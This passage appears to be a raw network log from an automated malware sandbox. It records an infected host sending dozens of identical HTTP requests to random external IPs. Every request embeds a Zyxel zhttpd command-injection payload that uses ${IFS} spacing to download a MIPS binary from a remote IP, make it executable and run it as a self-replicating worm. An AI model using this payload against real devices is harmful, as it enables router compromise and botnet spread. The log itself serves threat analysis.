                                      Jan 19, 2024 17:29:40.937256098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6327192.168.2.1447704137.237.79.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937290907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6328192.168.2.145906272.234.113.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937311888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6329192.168.2.144813475.137.80.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937344074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6330192.168.2.1441368163.238.42.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937433004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6331192.168.2.144117495.202.230.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937469006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6332192.168.2.144007882.98.211.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937505960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6333192.168.2.145988092.132.53.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937536001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6334192.168.2.144507824.191.63.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937570095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6335192.168.2.1433066140.21.32.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937597036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6336192.168.2.1460784207.136.145.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937709093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6337192.168.2.1442672158.174.249.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937752962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6338192.168.2.1450268118.84.214.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937769890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6339192.168.2.143947412.149.194.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937793970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6340192.168.2.144950297.233.161.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937829018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6341192.168.2.145389842.31.97.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937877893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6342192.168.2.143505238.162.150.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937938929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6343192.168.2.1449920112.224.36.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.937962055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6344192.168.2.1439830196.245.126.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938013077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6345192.168.2.1441750135.178.151.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938056946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6346192.168.2.1440658189.247.102.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938090086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6347192.168.2.1447446124.93.51.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938131094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6348192.168.2.1433426207.11.191.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938179970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6349192.168.2.1443330217.78.205.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938215017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6350192.168.2.145609058.19.58.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938265085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6351192.168.2.1454262152.217.144.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938304901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6352192.168.2.1444514140.89.147.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938343048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6353192.168.2.1459140117.96.26.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938376904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6354192.168.2.145128040.185.99.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938427925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6355192.168.2.1450378147.4.50.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938478947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6356192.168.2.1437078108.81.24.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938519955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6357192.168.2.145857293.21.200.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938551903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6358192.168.2.143457232.210.129.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938589096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6359192.168.2.145901677.43.201.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938636065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6360192.168.2.146028062.80.162.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938684940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6361192.168.2.1450962116.184.30.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938725948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6362192.168.2.144098287.130.199.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938772917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6363192.168.2.143338817.6.29.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938808918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6364192.168.2.1445138182.43.88.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938863039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6365192.168.2.1434630169.74.1.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938896894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6366192.168.2.1432998177.54.120.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938932896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6367192.168.2.1456908121.162.13.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.938960075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6368192.168.2.1448362216.144.63.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939011097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6369192.168.2.14547422.8.194.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939058065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6370192.168.2.1457696105.213.82.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939090014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6371192.168.2.1451534184.69.182.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939112902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6372192.168.2.1439104105.241.169.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939147949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6373192.168.2.1459642152.202.130.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939188004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6374192.168.2.144010247.121.32.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939214945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6375192.168.2.1456960119.114.221.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939256907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6376192.168.2.1435522137.204.190.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939294100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6377192.168.2.1443474202.122.189.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939317942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6378192.168.2.145888282.4.232.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939374924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6379192.168.2.1457008198.178.102.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939405918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6380192.168.2.1449082160.33.140.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939466000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6381192.168.2.1442934101.115.36.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939487934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6382192.168.2.1441018139.181.211.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939526081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6383192.168.2.145564070.187.213.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939585924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6384192.168.2.1459490135.131.182.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939619064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6385192.168.2.143497092.154.201.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939645052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6386192.168.2.1443470172.113.75.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939701080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6387192.168.2.143857617.108.132.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939728022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6388192.168.2.1440566212.159.123.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939769983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6389192.168.2.1439034169.251.35.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:40.939800978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6390192.168.2.1449936159.7.77.116443
                                      TimestampBytes transferredDirectionData
